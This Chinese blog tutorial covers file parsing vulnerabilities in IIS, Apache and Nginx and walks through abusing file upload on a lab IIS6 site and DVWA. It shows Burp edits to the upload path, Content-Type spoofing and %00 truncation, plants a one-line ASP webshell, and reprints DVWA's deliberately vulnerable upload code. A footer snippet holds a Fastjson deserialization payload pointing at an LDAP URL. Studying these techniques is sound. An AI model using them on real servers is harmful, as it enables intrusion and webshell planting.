解析漏洞整理

最新推荐文章于 2024-06-04 10:03:12 发布
最新推荐文章于 2024-06-04 10:03:12 发布
阅读量6.3k 收藏 10
点赞数 2
分类专栏: 网络渗透 文章标签: 网络渗透 解析漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011781521/article/details/58630742
版权

1.什么是解析漏洞


以其他格式执行出脚本格式的效果。


2.解析漏洞产生的条件


1.命名规则

2.搭建平台


3.常见的解析漏洞


(一)IIS5.x-6.x解析漏洞

使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。


1)目录解析(6.0)

形式:www.xxx.com/xx.asp/xx.jpg

原理: 服务器默认会把.asp,.asp目录下的文件都解析成asp文件。

2)文件解析

形式:www.xxx.com/xx.asp;.jpg

原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

3)解析文件类型

IIS6.0 默认的可执行文件除了asp还包含这三种 :

/test.asa
/test.cer
/test.cdx


(二)IIS7.5解析漏洞

IIS7.5的漏洞与nginx的类似,都是由于php配置文件中,开启了cgi.fix_pathinfo,而这并不是nginx或者iis7.5本身的漏洞。


(三)apache解析漏洞

漏洞原理

Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如test.php.qwe.asd “.qwe”和”.asd” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.qwe.asd解析成php。

漏洞形式

www.xxxx.xxx.com/test.php.php123

其余配置问题导致漏洞

(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。

(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以php 方式执行。

修复方案

1.apache配置文件,禁止.php.这样的文件执行,配置文件里面加入

2.用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so

把#号去掉,重启apache,在网站根目录下建立.htaccess文件


(四)Nginx解析漏洞

漏洞原理

Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI,但是PHP为什么会接受这样的参数,并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项,那么就会触发在PHP中的如下逻辑:

PHP会认为SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就会将phpinfo.jpg作为PHP文件来解析了

漏洞形式

www.xxxx.com/UploadFiles/image/1.jpg/1.php

www.xxxx.com/UploadFiles/image/1.jpg%00.php

www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php

另外一种手法:上传一个名字为test.jpg,然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。


总结:

IIS6.0x和脚本格式可以自定义)

文件命名形式:

正常命名:www.xxx.com/logo.jpg

触发解析漏洞命名:www.xxx.com/logo.asp;.jpg  logo.asp;.x.jpg

文件夹命名形式:

正常命名:www.xxx.com/images/qq.jpg

触发解析漏洞命名:www.xxx.com/image.asp/qq.jpg

 

IIS7.X(x自定义,只能执行php)

正常命名:www.xxx.com/logo.jpg

触发解析漏洞命名:www.xxx.com/logo.jpg/x.php

 

Apache(xxxx代表任意后缀,向上识别解析)

正常命名:www.xxx.com/a.php

触发解析漏洞命名:www.xxx.com/a.php.xxxx

 

Nginxiis7.x一致



4.一个简单的解析例子


测试环境为:windwos2003+iis6.0 注意:测试环境必须是在windwos2003+iis6.0的情况下才能成功解析,不能是小旋风之类的软件来测试。


1)文件解析


直接访问图片地址: http://192.168.87.129:8067/6.jpg




改变图片后戳名为:6.asp;.jpg 再次访问,就会发现,jpg格式的图片被解析成了asp格式的脚本语言。




还可以改成:6.asp;1234.jpg 效果是一样的。




2)目录解析


将文件改为一个正常的图片格式文件,然后把它复制到一个test.asp的目录下,然后方法,发现也能正常解析。





5.解析漏洞利用场景


解析漏洞主要用在文件上传,上传一些图片什么的,然后通过解析漏洞,解析为动态语言。而上传很重要的一点就是命名规则,因为如果你不知道,服务器的文件命名规则的话,解析漏洞就不好利用,因为我们要获取我们上传文件名,只有获取到了上传的文件名,才能进行下一步操作,而命名规则无非就是以下两种。


测试源码:http://download.csdn.net/detail/u011781521/9766646 下载好之后,在服务器中新建一个网站,并复制进去。


然后访问首页:http://192.168.87.129:8898/Index.asp

后台登录地址: http://192.168.87.129:8898/Tcnet/Admin_Login.asp

文件上传地址: http://192.168.87.129:8898/Upload.asp?formname=myform&editname=bookpic&uppath=upfile&&filelx=jpg 用户名与密码: admin admin 注意:必须先要登录才能使用文件上传功能。


1.本地,服务端命名一致


1)filepath上传利用


直接上传解析漏洞命名的后门文件


访问这个地址:http://192.168.87.129:8898/Upload.asp?formname=myform&editname=bookpic&uppath=upfile&&filelx=jpg



先直接上传一个asp的文件试试看能否上传




发现并不能上传。那我们就利用解析漏洞来试下看,把asp改为fk.asp;.jpg(注:这里是图片一句话)




OK能上传。复制上传好的地址,然后访问






图片能查看,但是asp并没有被解析。。。这是时候怎么办,从新上传xxx.asp;.jpg,然后用Burp来抓包,进行修改。





右键发送到Repeater中去




修改其中的"filepath"在upfile/后面加上aaa.asp;. 然后GO一下你就会发现,这里就成了一个解析漏洞了




然后访问下这个地址,asp成功的被解析了。




然后用菜刀进行连接。




密码就是"include";对应的asp一句话<%execute request("include")%>  然后点击添加。。




连接成功。


2.本地,服务端命名不一致,基于时间,日期等命名


1)filetype突破


这里采用DVWA来测试,




然后点击"View Source"查看源码。


Low代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) {  //判断是否是post传过来的,也就是判断upload是否为空

    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";   //取得网站绝对路径,然后用绝对路径+相对路径得到一个完整的路径。

    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );   //根据上面得到的完整路径+得到的文件名。

    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {  //判断你上传的图片是否成功移动到完整路径中
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 

?>

$_FILES['uploaded']['name'] :取得$_FILES全局文件变量的上传文件名


该源码存在的问题:


第一个没有验证后缀格式




什么格式得可以上传。。


第二个客户端,服务端文件命名一致





Medium代码:


<?php 
 
if( isset( $_POST[ 'Upload' ] ) ) { 

    // 我们要往哪里写? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // 文件信息
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 

    // 判断这是一个图片吗? 
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 

        // 我们可以移动文件到上传文件夹吗? 
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

$_FILES['uploaded']['name'];     取得$_FILES全局文件变量的上传文件名

$_FILES['uploaded']['type'];     取得$_FILES全局文件变量的上传文件类型

$_FILES['uploaded']['size'];    取得$_FILES全局文件变量的上传大小


验证文件上传类型及大小,还是本地,服务端命名一致


然后我们来上传个asp文件用Burp抓包,看是否能成功上传。




拦截到之后发送到Repeater,然后GO一下




上传失败。。。这就很好奇了,明明这里没有验证文件后戳名,为什么还是上传不了???? 但是,他这里验证了文件类型!!我们看下上传的文件是什么类型的




看它上传的类型为:application/octet-stram 所以他把上传的asp当做application来处理里。




然后我们改一下content-type的类型为:image/jpeg




再次GO一下,发现上传成功了。




2)%00截断:截断字符


注意:数据包修改%00,务必进行url编码


把6.asp;.jpg改为6.asp%00.jpg



然后选中右键把%00进行url编码下。



这样的话,就把.jpg给截断了,然后就变成了6.asp。





High代码:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 

    // 我们要往哪里写? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // 文件信息
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 

    // 判断是否是图片? 
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 

        // 我们可以移动文件到上传文件夹吗? 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?>

strrpos( $uploaded_name, '.' ) + 1 的作用就是去文件的最后一个点


例如:


www.jpg.zip.txt.asp


他就会截取最后一个点,所以是绕不过的。


然后下面又是一个判断。格式必须是图片型的才能执行下面的代码。

码农致富
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
解析漏洞
niqiu320的博客
04-23 3831
IIS解析漏洞 什么是解析漏洞解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞解析漏洞分类: IIS解析漏洞 Nginx解析漏洞 Apache解析漏洞 IIS解析漏洞: 1、目录解析: 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2、文件解析 .asp;.jpg像这种畸形文件名在“;”后面的直接被忽略,也就是说当成.asp ...
常见的解析漏洞总结
浅浅的博客
06-14 6063
一、解析漏洞 解析漏洞指的是服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。大部分解析漏洞的产生都是由应用程序本身的漏洞导致的。 二、常见的解析漏洞 1、IIS5.x-6.x解析漏洞 使用 IIS5.x-6.x 版本的服务器,大多为Windows server 2003,网站比较古老,开发语句一般为asp;该解析...
中间件解析漏洞及Apache解析漏洞原理和复现
最新发布
A526847的博客
06-04 1213
在windows下,会直接根据最后的.来进 行分隔,将其判定为doc文件,但在apache中可不是这样的,apache会从后往前依次进行判别,遇到不 认识的后缀,便会往前读,如果还是不认识再往前,若是到最后一个都不认识,则会将该文件当成默认 类型文件读取。在2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,shell.php\x0A将被按照PHP后缀进行解析, 导致绕过一些服务器的安全策略。这种情况,多后缀的文件名中只要存在.php后缀,则就会将该文件当做php文件解析
IIS漏洞-解析漏洞
swordheart的博客
11-30 7140
漏洞介绍 解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本文件等当做可执行的脚本文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。 IIS 5.x/6.0解析漏洞 目录解析:在网站下建立文件夹的名称中带有.asp、.asa等可执行脚本文件后缀为后缀的文件夹,其目录内的任何扩展名的文件都被IIS当作可执行文件来解析并执行。http://www.xxx.com/xx.asp/xx.jpg IIS 6.0环境下正常访问图片 通过访问1.asp/one.j..
ASP存在的漏洞
weixin_58782362的博客
07-20 342
asp在当下其实存在的漏洞已经很少了。所以不算是重点,但可以作为了解。
整理asp漏洞与入侵方式.doc
01-15
0xB4 一个关于IIS6解析漏洞的小知识 9 0xB5 狗、神、盾 10 0xB6 IIS7 10 0xB7 COOIKE伪造,百度谷歌搜索CMS漏洞 10 0xB8 编辑器后台 10 0xC0附件 10 0xC1 沙盘sandbox 10 0xC2 LOCK数据包 10 0xC3 IISWRITE 10 0xC4 ...
报告整理_nessus报告整理_
09-29
Nessus是一款广泛使用的网络漏洞扫描工具,它能够检测网络上的系统和应用程序的安全漏洞,并生成详细的HTML报告。在处理大量扫描结果时,手动分析这些报告可能会非常耗时且效率低下。因此,通过编写Python脚本自动化...
影视解析Xyplayer 3.96最新正式版本网站源码源码资源下载整理.zip
08-21
开发者需要了解源码的安全漏洞,及时进行补丁更新,防止恶意攻击。同时,对于用户的隐私数据,软件应有严格的保护措施,如加密传输、数据脱敏等。 7. **部署与运行环境** 在部署Xyplayer之前,开发者需要准备合适...
NMAP漏洞扫描
07-16
9. **结果解析与报告**:NMAP的输出结果通常包含大量的信息,学习如何正确解读和整理这些信息,以便进行后续的安全分析和决策,是使用NMAP的重要环节。 10. **持续更新与维护**:NMAP作为开源项目,其功能和脚本库...
易语言windows漏洞扫描
07-17
4. **报告生成与展示**:将扫描结果整理成用户可读的报告,可能包括每个漏洞的严重程度、影响范围以及修复建议。这部分可能涉及界面设计,使用户能直观地了解系统的安全状况。 5. **修复建议与自动化修复**:如果...
解析漏洞总结
wkend的博客
09-23 2334
0x01 什么是解析漏洞? 简单的说,解析漏洞就是web容器将其他格式的文件解析为可执行脚本语言,攻击者可以利用这个特征去执行一些攻击行为。 oxo2 概述 通常会出现解析漏洞的web容器有IIS 6.0、Nginx、Apache。 0x03 IIS解析漏洞 使用IIS6.0的服务器,一般是Windows server 2003,解析语言是asp,不能解析aspx语言。 利用方式 1. 目录解析 ...
文件解析漏洞大全
scu_hacker博客
01-25 6141
目录 前言 一、apache解析漏洞 二、nginx解析漏洞 2.1nginx<8.03 2.2nginx 0.5,0.6,0.7 <= 0.7.65, 0.8 <= 0.8.37 三、IIS解析漏洞 3.1IIS 5.0/6.0 3.2 IIS 6.0 3.3IIS 7.x 四、windows解析漏洞 4.1​​​​​​​上传jsp%20的文件或者jsp.,windows会删除.和空格 ​​​​​​​4.2上传jsp::DATA文件,windows会...
网站漏洞解析及黑客入侵防范方法
weixin_30892889的博客
10-16 225
如何更好的达到防范黑客攻击,本人提一下个人意见!第一,免费程序不要真的就免费用,既然你可以共享原码,那么攻击者一样可以分析代码。如果在细节上注意防范,那样你站点的安全性就大大的提高了。即使出现了SQL Injection这样的漏洞,攻击者也不可能马上拿下你的站点。   由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是, 由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可...
Web渗透测试----4、常见解析漏洞
七天
12-22 964
文章目录原理一、Apache文件解析漏洞二、IIS文件解析漏洞三、Nginx文件解析漏洞四、其他文件解析漏洞 原理 文件解析漏洞:是指 Web 容器(Apache、nginx、iis 等)在解析文件时以脚本格式去执行。 漏洞产生条件: 1、搭建平台 2、命名规则 一、Apache文件解析漏洞 1.1、漏洞原理 Apache在处理多后缀文件时,会根据其特性,自右往左依次识别,直到遇到自己可以识别的后缀名时,才进行解析。 1.2、漏洞形式 如:http://www.xxx.com/1.jpg.php.aef
Csrf漏洞概述及其原理
gl620321的博客
05-01 7060
一.Csrf漏洞的概述 1.CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,C...
解析漏洞(Parsing Vulnerability)
m0_63444285的博客
04-04 188
解析漏洞(Parsing Vulnerability)是指攻击者利用应用程序在解析输入数据时某些漏洞,将恶意数据注入到应用程序中,从而执行未授权的操作或者以应用程序的身份执行恶意代码,从而导致系统被攻击的一种漏洞解析漏洞可以出现在各种类型的应用程序中,例如Web应用程序、解析器等。常见的解析漏洞包括XML解析漏洞、JSON解析漏洞、SQL注入漏洞等。攻击者可以利用解析漏洞,将恶意数据插入到应用程序中,从而实现各种攻击,例如执行远程命令、访问未授权的数据、进行信息泄漏等。
文件解析漏洞
热门推荐
谢公子的博客
09-25 1万+
目录 文件解析漏洞 IIS解析漏洞 目录解析漏洞(/test.asp/1.jpg) 文件名解析漏洞(test.asp;.jpg) 畸形解析漏洞(test.jpg/*.php) 其他解析漏洞 Ngnix解析漏洞 畸形解析漏洞(test.jpg/*.php) %00空字节代码解析漏洞 CVE-2013-4547(%20%00) Apache解析漏洞 文件名解析漏洞 .htac...
fastjson漏洞复现整理
12-22
根据提供的引用内容,Fastjson存在多个反序列化远程命令执行漏洞。为了演示Fastjson漏洞的复现,以下是一个简单的示例: 1. 首先,我们需要准备一个恶意的JSON字符串,用于触发Fastjson的反序列化漏洞。假设我们的恶意JSON字符串如下: ```json { "name": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "xxxx": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://localhost:1389/Exploit", "autoCommit": true } } ``` 2. 接下来,我们可以使用Java代码来复现Fastjson的漏洞。假设我们的Java代码如下: ```java import com.alibaba.fastjson.JSON; public class FastjsonVulnerabilityDemo { public static void main(String[] args) { String json = "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"xxxx\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/Exploit\",\"autoCommit\":true}}"; JSON.parse(json); } } ``` 3. 运行上述Java代码,Fastjson将解析恶意的JSON字符串,并触发反序列化漏洞。这可能导致远程命令执行或其他安全问题。 请注意,上述示例仅用于演示Fastjson的漏洞复现过程。在实际应用中,为了防止Fastjson漏洞的利用,建议及时升级Fastjson版本或采取其他安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值